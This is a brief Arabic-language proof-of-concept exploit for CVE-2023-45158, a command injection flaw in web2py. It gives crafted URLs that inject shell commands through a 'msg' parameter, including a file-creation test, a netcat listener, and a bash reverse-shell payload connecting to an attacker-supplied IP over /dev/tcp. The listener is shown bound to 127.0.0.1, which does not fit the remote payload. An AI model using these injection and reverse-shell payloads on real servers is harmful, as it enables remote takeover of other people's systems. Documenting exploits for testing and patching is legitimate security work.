
استغلال إثبات المفهوم لـ CVE-2023-45158، وهي ثغرة حقن أوامر في web2py. يوضح تنفيذ تعليمات برمجية عن بعد عبر طلبات HTTP مصممة، بما في ذلك إنشاء الملفات وحمولات الصدفة العكسية.
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. استبدل <IP-ADDRESS> و <YOUR-COMMAND> بالقيم الخاصة بك.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
على جهاز المهاجم، قم بتشغيل nc -l 127.0.0.1 8080
اذهب إلى الرابط http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. استبدل <ATTACKER-IP>.